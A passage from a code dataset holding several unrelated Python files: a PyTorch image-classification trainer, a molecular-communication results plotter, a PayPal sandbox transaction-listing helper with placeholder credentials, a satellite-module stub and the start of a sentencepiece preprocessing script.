sep=\"\\n\")\r\n for label, score in pred:\r\n print(f\"\\t{label}:{score: >10}\")\r\n print(\"-\" * 50, \"\\n\")\r\n return predictions\r\nclassification_models = {\r\n \"resnet50\": {\r\n \"model\": resnet50(pretrained=False)\r\n },\r\n \"densenet121\": {\r\n \"model\": densenet121(pretrained=False)\r\n },\r\n \"inceptionv3\": {\r\n \"model\": inception_v3(pretrained=False)\r\n },\r\n \"mobilenetv2\": {\r\n \"model\": mobilenet_v2(pretrained=False)\r\n }\r\n}\r\n\r\n\r\nclass ImageClassification:\r\n def __init__(self) -> None:\r\n self.__model_type: str = None\r\n self.__model: Union[resnet50, densenet121, mobilenet_v2, inception_v3] = None\r\n self.__model_path: str = None\r\n self.__classes_path: str = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"imagenet_classes.txt\")\r\n self.__model_loaded: bool = False\r\n self.__device: str = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__classes: List[str] = []\r\n\r\n def setModelPath(self, path: str):\r\n if os.path.isfile(path):\r\n extension_check(path)\r\n self.__model_path = path\r\n else:\r\n raise ValueError(\r\n f\"The path '{path}' isn't a valid file. Ensure you specify the path to a valid trained model file.\"\r\n )\r\n\r\n def __load_classes(self) -> List[str]:\r\n with open(self.__classes_path) as f:\r\n self.__classes = [c.strip() for c in f.readlines()]\r\n\r\n def __load_image(self, image_input: Union[str, np.ndarray, Image.Image]) -> torch.Tensor:\r\n images = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if type(image_input) == str:\r\n if os.path.isfile(image_input):\r\n img = Image.open(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"image path '{image_input}' is not found or a valid file\")\r\n elif type(image_input) == np.ndarray:\r\n img = Image.fromarray(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n elif \"PIL\" in str(type(image_input)):\r\n img = image_input.convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n return torch.stack(images)\r\n\r\n def setModelTypeAsResNet50(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"resnet50\"\r\n\r\n def setModelTypeAsDenseNet121(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"densenet121\"\r\n\r\n def setModelTypeAsInceptionV3(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"inceptionv3\"\r\n\r\n def setModelTypeAsMobileNetV2(self):\r\n if self.__model_type == None:\r\n self.__model_type = \"mobilenetv2\"\r\n\r\n def useCPU(self):\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self):\r\n if not self.__model_loaded:\r\n try:\r\n if self.__model_path == None:\r\n raise ValueError(\r\n \"Model path not specified. Call '.setModelPath()' and parse the path to the model file before loading the model.\"\r\n )\r\n\r\n if self.__model_type in classification_models.keys():\r\n self.__model = classification_models[self.__model_type][\"model\"]\r\n else:\r\n raise ValueError(\r\n f\"Model type '{self.__model_type}' not supported.\"\r\n )\r\n state_dict = torch.load(self.__model_path)\r\n if self.__model_type == \"densenet121\":\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n\r\n self.__model.load_state_dict(\r\n state_dict\r\n )\r\n self.__model.to(self.__device)\r\n self.__model_loaded = True\r\n self.__model.eval()\r\n self.__load_classes()\r\n except Exception:\r\n print(traceback.print_exc())\r\n print(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classifyImage(self, image_input: Union[str, np.ndarray, Image.Image], result_count: int = 5) -> Tuple[\r\n List[str], List[float]]:\r\n if not self.__model_loaded:\r\n raise RuntimeError(\r\n \"Model not yet loaded. You need to call '.loadModel()' before performing image classification\"\r\n )\r\n\r\n images = self.__load_image(image_input)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n topN_prob, topN_catid = torch.topk(probabilities, result_count)\r\n\r\n predictions = [\r\n [\r\n (self.__classes[topN_catid[i][j]], topN_prob[i][j].item() * 100)\r\n for j in range(topN_prob.shape[1])\r\n ]\r\n for i in range(topN_prob.shape[0])\r\n ]\r\n\r\n labels_pred = []\r\n probabilities_pred = []\r\n\r\n for idx, pred in enumerate(predictions):\r\n for label, score in pred:\r\n labels_pred.append(label)\r\n probabilities_pred.append(round(score, 4))\r\n\r\n return labels_pred, probabilities_pred\r\n\r\ndef resnet50_train_params():\r\n model = resnet50(pretrained=False)\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 1e-4,\r\n \"lr\": 0.1,\r\n \"lr_decay_rate\": None,\r\n \"lr_step_size\": None\r\n }\r\n\r\n\r\ndef inception_v3_train_params():\r\n model = inception_v3(pretrained=False, init_weights=False)\r\n\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 0,\r\n \"lr\": 0.045,\r\n \"lr_decay_rate\": 0.94,\r\n \"lr_step_size\": 2\r\n }\r\n\r\n\r\ndef mobilenet_v2_train_params():\r\n model = mobilenet_v2(pretrained=False)\r\n\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 4e-5,\r\n \"lr\": 0.045,\r\n \"lr_decay_rate\": 0.98,\r\n \"lr_step_size\": 1\r\n }\r\n\r\n\r\ndef densenet121_train_params():\r\n model = densenet121(pretrained=False)\r\n\r\n return {\r\n \"model\": model,\r\n \"optimizer\": SGD,\r\n \"weight_decay\": 1e-4,\r\n \"lr\": 0.1,\r\n \"lr_decay_rate\": None,\r\n \"lr_step_size\": None,\r\n }\r\ndata_transforms1 = {\r\n \"train\":transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ]),\r\n \"test\": transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ])\r\n }\r\n\r\ndata_transforms2 = {\r\n \"train\":transforms.Compose([\r\n transforms.RandomResizedCrop(299),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ]),\r\n \"test\": transforms.Compose([\r\n transforms.Resize(299),\r\n transforms.CenterCrop(299),\r\n transforms.ToTensor(),\r\n transforms.Normalize(\r\n [0.485, 0.456, 0.406],\r\n [0.229, 0.224, 0.225]\r\n )\r\n ])\r\n }\r\n\r\ndef extension_check(file_path: str):\r\n if file_path.endswith(\".h5\"):\r\n raise RuntimeError(\"Fara modele .h5\")\r\n elif file_path.endswith(\".pt\") == False and file_path.endswith(\".pth\") == False:\r\n raise ValueError(f\"Model nevalid {os.path.basename(file_path)}. Adaugati model '.pt' sau '.pth' \")\r\n\r\ntry:\r\n import torch\r\n import torchvision\r\nexcept:\r\n try:\r\n import tensorflow\r\n import keras\r\n\r\n raise RuntimeError(\"Lipsa Torch\")\r\n except:\r\n raise RuntimeError(\"Torch neinstalat\")\r\n\r\nclass ClassificationModelTrainer():\r\n def __init__(self) -> None:\r\n self.__model_type = \"\"\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__data_dir = \"\"\r\n self.__data_loaders = None\r\n self.__class_names = None\r\n self.__dataset_sizes = None\r\n self.__dataset_name = \"\"\r\n self.__model = None\r\n self.__optimizer = None\r\n self.__lr_scheduler = None\r\n self.__loss_fn = nn.CrossEntropyLoss()\r\n self.__transfer_learning_mode = \"fine_tune_all\"\r\n self.__model_path = \"\"\r\n self.__training_params = None\r\n\r\n def __set_training_param(self) -> None:\r\n if not self.__model_type:\r\n raise RuntimeError(\"The model type is not set!!!\")\r\n self.__model = self.__training_params[\"model\"]\r\n optimizer = self.__training_params[\"optimizer\"]\r\n lr_decay_rate = self.__training_params[\"lr_decay_rate\"]\r\n lr_step_size = self.__training_params[\"lr_step_size\"]\r\n lr = self.__training_params[\"lr\"]\r\n weight_decay = self.__training_params[\"weight_decay\"]\r\n\r\n if self.__model_path:\r\n self.__set_transfer_learning_mode()\r\n print(\"==> Transfer learning enabled\")\r\n\r\n \r\n \r\n \r\n if self.__model_type == \"mobilenet_v2\":\r\n in_features = self.__model.classifier[1].in_features\r\n self.__model.classifier[1] = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"densenet121\":\r\n in_features = self.__model.classifier.in_features\r\n self.__model.classifier = nn.Linear(in_features, len(self.__class_names))\r\n else:\r\n in_features = self.__model.fc.in_features\r\n self.__model.fc = nn.Linear(in_features, len(self.__class_names))\r\n\r\n self.__model.to(self.__device)\r\n self.__optimizer = optimizer(\r\n self.__model.parameters(),\r\n lr=lr,\r\n momentum=0.9,\r\n weight_decay=weight_decay\r\n )\r\n if lr_decay_rate and lr_step_size:\r\n self.__lr_scheduler = lr_scheduler.StepLR(\r\n self.__optimizer,\r\n gamma=lr_decay_rate,\r\n step_size=lr_step_size\r\n )\r\n\r\n def __set_transfer_learning_mode(self) -> None:\r\n\r\n state_dict = torch.load(self.__model_path)\r\n if self.__model_type == \"densenet121\":\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n\r\n self.__model.load_state_dict(state_dict)\r\n self.__model.to(self.__device)\r\n\r\n if self.__transfer_learning_mode == \"freeze_all\":\r\n for param in self.__model.parameters():\r\n param.requires_grad = False\r\n\r\n def __load_data(self, batch_size: int = 8) -> None:\r\n\r\n if not self.__data_dir:\r\n raise RuntimeError(\"The dataset directory not yet set.\")\r\n image_dataset = {\r\n x: datasets.ImageFolder(\r\n os.path.join(self.__data_dir, x),\r\n data_transforms2[x] if self.__model_type == \"inception_v3\" else data_transforms1[x]\r\n )\r\n for x in [\"train\", \"test\"]\r\n }\r\n self.__data_loaders = {\r\n x: torch.utils.data.DataLoader(\r\n image_dataset[x], batch_size=batch_size,\r\n shuffle=True\r\n )\r\n for x in [\"train\", \"test\"]\r\n }\r\n self.__dataset_sizes = {x: len(image_dataset[x]) for x in [\"train\", \"test\"]}\r\n self.__class_names = image_dataset[\"train\"].classes\r\n self.__dataset_name = os.path.basename(self.__data_dir.rstrip(os.path.sep))\r\n\r\n def setDataDirectory(self, data_directory: str = \"\") -> None:\r\n if os.path.isdir(data_directory):\r\n self.__data_dir = data_directory\r\n return\r\n raise ValueError(\"expected a path to a directory\")\r\n\r\n def setModelTypeAsMobileNetV2(self) -> None:\r\n self.__model_type = \"mobilenet_v2\"\r\n self.__training_params = mobilenet_v2_train_params()\r\n\r\n def setModelTypeAsResNet50(self) -> None:\r\n self.__model_type = \"resnet50\"\r\n self.__training_params = resnet50_train_params()\r\n\r\n def setModelTypeAsInceptionV3(self) -> None:\r\n self.__model_type = \"inception_v3\"\r\n self.__training_params = inception_v3_train_params()\r\n\r\n def setModelTypeAsDenseNet121(self) -> None:\r\n self.__model_type = \"densenet121\"\r\n self.__training_params = densenet121_train_params()\r\n\r\n def freezeAllLayers(self) -> None:\r\n self.__transfer_learning_mode = \"freeze_all\"\r\n\r\n def fineTuneAllLayers(self) -> None:\r\n self.__transfer_learning_mode = \"fine_tune_all\"\r\n\r\n def trainModel(\r\n self,\r\n num_experiments: int = 100,\r\n batch_size: int = 8,\r\n model_directory: str = None,\r\n transfer_from_model: str = None,\r\n verbose: bool = True\r\n ) -> None:\r\n\r\n\r\n self.__load_data(batch_size)\r\n\r\n if transfer_from_model:\r\n extension_check(transfer_from_model)\r\n self.__model_path = transfer_from_model\r\n\r\n self.__set_training_param()\r\n\r\n if not model_directory:\r\n model_directory = os.path.join(self.__data_dir, \"models\")\r\n\r\n if not os.path.exists(model_directory):\r\n os.mkdir(model_directory)\r\n\r\n with open(os.path.join(model_directory, f\"{self.__dataset_name}_model_classes.json\"), \"w\") as f:\r\n classes_dict = {}\r\n class_list = sorted(self.__class_names)\r\n for i in range(len(class_list)):\r\n classes_dict[str(i)] = class_list[i]\r\n json.dump(classes_dict, f)\r\n\r\n since = time.time()\r\n\r\n best_model_weights = copy.deepcopy(self.__model.state_dict())\r\n best_acc = 0.0\r\n prev_save_name, recent_save_name = \"\", \"\"\r\n\r\n print(\"=\" * 50)\r\n print(\"Training with GPU\") if self.__device == \"cuda\" else print(\r\n \"Training with CPU. This might cause slower train.\")\r\n print(\"=\" * 50)\r\n\r\n for epoch in range(num_experiments):\r\n if verbose:\r\n print(f\"Epoch {epoch + 1}/{num_experiments}\", \"-\" * 10, sep=\"\\n\")\r\n\r\n \r\n for phase in [\"train\", \"test\"]:\r\n if phase == \"train\":\r\n self.__model.train()\r\n else:\r\n self.__model.eval()\r\n\r\n running_loss = 0.0\r\n running_corrects = 0\r\n\r\n \r\n for imgs, labels in tqdm(self.__data_loaders[phase]):\r\n imgs = imgs.to(self.__device)\r\n labels = labels.to(self.__device)\r\n\r\n self.__optimizer.zero_grad()\r\n\r\n with torch.set_grad_enabled(phase == \"train\"):\r\n output = self.__model(imgs)\r\n if self.__model_type == \"inception_v3\" and type(output) == InceptionOutputs:\r\n output = output[0]\r\n _, preds = torch.max(output, 1)\r\n loss = self.__loss_fn(output, labels)\r\n\r\n if phase == \"train\":\r\n loss.backward()\r\n self.__optimizer.step()\r\n running_loss += loss.item() * imgs.size(0)\r\n running_corrects += torch.sum(preds == labels.data)\r\n\r\n \r\n if phase == \"train\" and isinstance(self.__lr_scheduler, torch.optim.lr_scheduler.StepLR):\r\n self.__lr_scheduler.step()\r\n\r\n epoch_loss = running_loss / self.__dataset_sizes[phase]\r\n epoch_acc = running_corrects.double() / self.__dataset_sizes[phase]\r\n\r\n if verbose:\r\n print(f\"{phase} Loss: {epoch_loss:.4f} Accuracy: {epoch_acc:.4f}\")\r\n if phase == \"test\" and epoch_acc > best_acc:\r\n best_acc = epoch_acc\r\n recent_save_name = self.__model_type + f\"-{self.__dataset_name}-test_acc_{best_acc:.5f}_epoch-{epoch}.pt\"\r\n if prev_save_name:\r\n os.remove(os.path.join(model_directory, prev_save_name))\r\n best_model_weights = copy.deepcopy(self.__model.state_dict())\r\n torch.save(\r\n best_model_weights, os.path.join(model_directory, recent_save_name)\r\n )\r\n prev_save_name = recent_save_name\r\n\r\n time_elapsed = time.time() - since\r\n print(f\"Training completed in {time_elapsed // 60:.0f}m {time_elapsed % 60:.0f}s\")\r\n print(f\"Best test accuracy: {best_acc:.4f}\")\r\n\r\n\r\nclass CustomImageClassification:\r\n\r\n def __init__(self) -> None:\r\n self.__model = None\r\n self.__model_type = \"\"\r\n self.__model_loaded = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__json_path = None\r\n self.__class_names = None\r\n self.__model_loaded = False\r\n\r\n def __load_image(self, image_input: Union[str, np.ndarray, Image.Image]) -> torch.Tensor:\r\n images = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if type(image_input) == str:\r\n if os.path.isfile(image_input):\r\n img = Image.open(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"image path '{image_input}' is not found or a valid file\")\r\n elif type(image_input) == np.ndarray:\r\n img = Image.fromarray(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n elif \"PIL\" in str(type(image_input)):\r\n img = image_input.convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n return torch.stack(images)\r\n\r\n def __load_classes(self):\r\n if self.__json_path:\r\n with open(self.__json_path, 'r') as f:\r\n self.__class_names = list(json.load(f).values())\r\n else:\r\n raise ValueError(\"Invalid json path. Set a valid json mapping path by calling the 'setJsonPath()' function\")\r\n\r\n def setModelPath(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n extension_check(path)\r\n self.__model_path = path\r\n self.__model_loaded = False\r\n else:\r\n raise ValueError(\r\n f\"The path '{path}' isn't a valid file. Ensure you specify the path to a valid trained model file.\"\r\n )\r\n\r\n def setJsonPath(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__json_path = path\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a valid path to the json mapping file.\"\r\n )\r\n\r\n def setModelTypeAsMobileNetV2(self) -> None:\r\n self.__model_type = \"mobilenet_v2\"\r\n\r\n def setModelTypeAsResNet50(self) -> None:\r\n self.__model_type = \"resnet50\"\r\n\r\n def setModelTypeAsInceptionV3(self) -> None:\r\n self.__model_type = \"inception_v3\"\r\n\r\n def setModelTypeAsDenseNet121(self) -> None:\r\n self.__model_type = \"densenet121\"\r\n\r\n def useCPU(self):\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self) -> None:\r\n\r\n if not self.__model_loaded:\r\n self.__load_classes()\r\n try:\r\n \r\n \r\n \r\n\r\n if self.__model_type == \"resnet50\":\r\n self.__model = resnet50(pretrained=False)\r\n in_features = self.__model.fc.in_features\r\n self.__model.fc = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"mobilenet_v2\":\r\n self.__model = mobilenet_v2(pretrained=False)\r\n in_features = self.__model.classifier[1].in_features\r\n self.__model.classifier[1] = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"inception_v3\":\r\n self.__model = inception_v3(pretrained=False)\r\n in_features = self.__model.fc.in_features\r\n self.__model.fc = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"densenet121\":\r\n self.__model = densenet121(pretrained=False)\r\n in_features = self.__model.classifier.in_features\r\n self.__model.classifier = nn.Linear(in_features, len(self.__class_names))\r\n else:\r\n raise RuntimeError(\"Unknown model type.\\nEnsure the model type is properly set.\")\r\n\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n\r\n if self.__model_type == \"densenet121\":\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n\r\n self.__model.load_state_dict(state_dict)\r\n self.__model.to(self.__device).eval()\r\n self.__model_loaded = True\r\n\r\n except Exception as e:\r\n raise Exception(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classifyImage(self, image_input: Union[str, np.ndarray, Image.Image], result_count: int) -> Tuple[\r\n List[str], List[float]]:\r\n if not self.__model_loaded:\r\n raise RuntimeError(\r\n \"Model not yet loaded. You need to call '.loadModel()' before performing image classification\"\r\n )\r\n\r\n images = self.__load_image(image_input)\r\n images = images.to(self.__device)\r\n\r\n with torch.no_grad():\r\n output = self.__model(images)\r\n probabilities = torch.softmax(output, dim=1)\r\n topN_prob, topN_catid = torch.topk(probabilities, result_count)\r\n\r\n predictions = [\r\n [\r\n (self.__class_names[topN_catid[i][j]], topN_prob[i][j].item() * 100)\r\n for j in range(topN_prob.shape[1])\r\n ]\r\n for i in range(topN_prob.shape[0])\r\n ]\r\n\r\n labels_pred = []\r\n probabilities_pred = []\r\n\r\n for idx, pred in enumerate(predictions):\r\n for label, score in pred:\r\n labels_pred.append(label)\r\n probabilities_pred.append(round(score, 4))\r\n\r\n return labels_pred, probabilities_pred","repo_name":"slabuionut/spectraUI","sub_path":"src/detlayer.py","file_name":"detlayer.py","file_ext":"py","file_size_in_byte":154017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3707458210","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 29 19:33:09 2020\n\n@author: jkpl - eddyazg7\n\"\"\"\nimport csv\nfrom collections import defaultdict\nfrom scipy import stats\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statistics as sta\nimport numpy as np, scipy.stats as st\nimport seaborn as sns\nfrom matplotlib import pyplot\nimport math\n\n\nm_mol = list()\nm_delay = list()\nm_pulse = list()\ni_mol = list()\ni_delay = list()\ni_pulse = list()\n\nNumPaq= 1\n\ndist = ['0.000002','0.000004','0.000006','0.000008','0.000010','0.000012','0.000014',\n '0.000016','0.000018','0.000020','0.000022','0.000024','0.000026']\n\nBM = 0 # Tipo de BM 0 Libre ---- 1 Deriva\nNumMol=10000\nD = 1*10**(-9)\ntw = 1050\n \nfor d in range (len(dist)):\n \n columns = defaultdict(list) # each value in each column is appended to a list\n #archivo = \"RxTime-0-0-\"+str(dist[d])+\".csv\" #Nodo-Tipo-Distancia \n archivo = \"RxTime-0-\"+str(BM)+\"-\"+dist[d]+\".csv\" #Nodo-Tipo-Distancia \n with open(archivo) as f:\n reader = csv.reader(f)\n for row in reader:\n for (i,v) in enumerate(row):\n \t columns[i].append(v)\n \n max_delay = list()\n max_mol = list()\n max_pulse = list()\n time = list()\n time1 = list()\n cont = list()\n contador=0\n t0=0\n \n delay = pow(float(dist[d]),2)/(D*4)\n ts = delay + (tw/2)\n TimeBit = np.zeros((NumPaq*8*NumMol, 3))\n cg = 0\n #tp = list()\n\n for i in range(NumPaq*8):\n time = list()\n for j in range(len(row)):\n if ((columns[j][i] != '0') & (columns[j][i] != '')):\n time.append(columns[j][i])\n time.sort()\n \n if (len(time) != 0):\n Tiempo_1Bit_Sup = list() \n Num_Mol = list()\n contador = 1\n for ii in range(len(time)):\n if ii == len(time)-1:\n Tiempo_1Bit_Sup.append(time[len(time)-1])\n Num_Mol.append(contador) \n elif time[ii] == time[ii+1]:\n contador = contador + 1\n else:\n Tiempo_1Bit_Sup.append(time[ii])\n Num_Mol.append(contador)\n contador = 1 \n \n aux = max(Num_Mol)\n max_mol.append(aux)\n aux = Num_Mol.index(aux)\n max_delay.append(float(Tiempo_1Bit_Sup[aux]))\n \n aux = max(Num_Mol)\n aux = aux/2\n \n bol = True\n for lk in range(len(Num_Mol)):\n if (Num_Mol[lk] >= aux) & (bol==True) :\n p1 = Tiempo_1Bit_Sup[lk]\n bol=False\n \n if (Num_Mol[lk] < aux) & (bol==False) :\n p2 = Tiempo_1Bit_Sup[lk]\n break\n p1=Tiempo_1Bit_Sup[0]\n max_pulse.append(float(p2)-float(p1))\n \n i_mol.append(max_mol)\n i_delay.append(max_delay)\n i_pulse.append(max_pulse)\n m_mol.append(sta.mean(max_mol))\n m_delay.append(sta.mean(max_delay))\n m_pulse.append(sta.mean(max_pulse))\n\n\ninterval_mol = np.zeros((5,len(dist)))\nfor i in range(len(i_mol)):\n for j in range(5):\n interval_mol[j][i] = i_mol[i][j]\n\ninterval_delay = np.zeros((5,len(dist)))\nfor i in range(len(i_delay)):\n for j in range(5):\n interval_delay[j][i] = i_delay[i][j] \n\ninterval_pulse = np.zeros((5,len(dist)))\nfor i in range(len(i_pulse)):\n for j in range(5):\n interval_pulse[j][i] = i_pulse[i][j] \n\n\n\nplt.figure(1)\nplt.plot(dist,m_mol,'r')\nsns.tsplot([interval_mol[0], interval_mol[1], interval_mol[2], interval_mol[3], interval_mol[4]] , err_style=\"ci_bars\", interpolate=False)\nplt.xlabel(\"Transmission distance [m]\",fontsize=21)\nplt.ylabel(\"Pulse amplitude [molecules]\",fontsize=21) \nplt.xticks(fontsize=15) \nplt.yticks(np.linspace(0, 450, 10, endpoint=True),fontsize=15)\nplt.grid() \npyplot.savefig(\"amplitud\"+\".png\")\nplt.show()\n\n\nplt.figure(2)\nplt.plot(dist,m_delay,'r')\nsns.tsplot([interval_delay[0], interval_delay[1], interval_delay[2], interval_delay[3], interval_delay[4]] , err_style=\"ci_bars\",interpolate=False)\nplt.xlabel(\"Transmission distance [m]\",fontsize=21)\nplt.ylabel(\"Pulse delay [s]\",fontsize=21) \nplt.xticks(fontsize=15) \nplt.yticks(fontsize=15)\nplt.grid()\npyplot.savefig(\"delay\"+\".png\")\nplt.show()\n\n\nplt.figure(3)\nplt.plot(dist,m_pulse,'r')\nsns.tsplot([interval_pulse[0], interval_pulse[1], interval_pulse[2], interval_pulse[3], interval_pulse[4]] , err_style=\"ci_bars\",interpolate=False)\nplt.xlabel(\"Transmission distance [m]\",fontsize=21)\nplt.ylabel(\"Pulse width [s]\",fontsize=21)\nplt.xticks(fontsize=15) \nplt.yticks(fontsize=15)\nplt.grid() \npyplot.savefig(\"pulse\"+\".png\")\nplt.show()\n\n\n\n","repo_name":"eddyzg7/nanoDMC","sub_path":"Resultados2.py","file_name":"Resultados2.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20210460261","text":"import logging\nfrom pprint import pprint\n\n# %%\nimport requests\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# %%\nspecification = {\n \"client_id\": \"REPLACE_ME\",\n \"secret\": \"REPLACE_ME\",\n \"start_date\": \"2021-06-01T00:00:00+00:00\",\n \"end_date\": \"2021-06-30T00:00:00+00:00\",\n \"is_sandbox\": True,\n}\n\n# %% READ and \n\nclient_id = specification.get(\"client_id\")\nsecret = specification.get(\"secret\")\n\n# %% GET API_TOKEN\n\ntoken_refresh_endpoint = \"https://api-m.sandbox.paypal.com/v1/oauth2/token\"\ndata = \"grant_type=client_credentials\"\nheaders = {\n \"Accept\": \"application/json\",\n \"Accept-Language\": \"en_US\",\n}\n\nresponse = requests.request(\n method=\"POST\",\n url=token_refresh_endpoint,\n data=data,\n headers=headers,\n auth=(client_id, secret),\n)\nresponse_json = response.json()\nprint(response_json)\nAPI_TOKEN = response_json[\"access_token\"]\n\n# CREATE TRANSACTIONS\n# for i in range(1000):\n# create_response = requests.post(\n# \"https://api-m.sandbox.paypal.com/v2/checkout/orders\",\n# headers={'content-type': 'application/json', 'authorization': f'Bearer {API_TOKEN}', \"prefer\": \"return=representation\"},\n# json={\n# \"intent\": \"CAPTURE\",\n# \"purchase_units\": [\n# {\n# \"amount\": {\n# \"currency_code\": \"USD\",\n# \"value\": f\"{float(i)}\"\n# }\n# }\n# ]\n# }\n# )\n#\n# print(create_response.json())\n\n# %% LIST TRANSACTIONS\n\nurl = \"https://api-m.sandbox.paypal.com/v1/reporting/transactions\"\n\nparams = {\n \"start_date\": \"2021-06-20T00:00:00+00:00\",\n \"end_date\": \"2021-07-10T07:19:45Z\",\n \"fields\": \"all\",\n \"page_size\": \"100\",\n \"page\": \"1\",\n}\n\nheaders = {\n \"Authorization\": f\"Bearer {API_TOKEN}\",\n \"Content-Type\": \"application/json\",\n}\nresponse = requests.get(\n url,\n headers=headers,\n params=params,\n)\n\npprint(response.json())\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-integrations/connectors/source-paypal-transaction/bin/fixture_helper.py","file_name":"fixture_helper.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"36811569306","text":"\"\"\"\nCommunications System (COM)\n\nName: COM.py\nDescription:\n \n \nSatellite Function:\n System is Responsible for all\n communications from the satellite. \n\"\"\"\nclass COM:\n def __init__(self):\n self.name = \"COM\"\n\n\n#####################################\n# main function used for testing\n#####################################\ndef main():\n print(\"\\nTESTING\\nCommunications System\\n\")\n #Insert Test Code Here\n com_mod = COM()\n print(com_mod.name)\n \n # End of Testing\n print(\"\\nTesting Complete\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"DrKroeger/SimpleSatelliteSurrogate","sub_path":"COM.py","file_name":"COM.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14324675698","text":"from typing import (\n List\n)\nimport itertools\nfrom tqdm import tqdm\nfrom loguru import logger\nimport sentencepiece as spm\nfrom argparse import ArgumentParser, Namespace\n\nSENTENCEPIECE_MODEL = spm.SentencePieceProcessor()\n\n\ndef main(args: Namespace):\n SENTENCEPIECE_MODEL.Load(args.sentencepiece_model_path)\n for dataset_path in args.dataset_paths:\n logger.info(\n f\"Processing dataset at path: {dataset_path}\",\n feautre='f-strings'\n )\n encoded_dataset = process_dataset(\n at_path=dataset_path,\n tagging_format=args.tagging_format\n )\n save_path = f\"{dataset_path}.spm\"\n logger.success(\n f\"Successfully processed dataset and started saving at path: {save_path}\",\n feature='f-strings'\n )\n with open(save_path, 'w') as file:\n 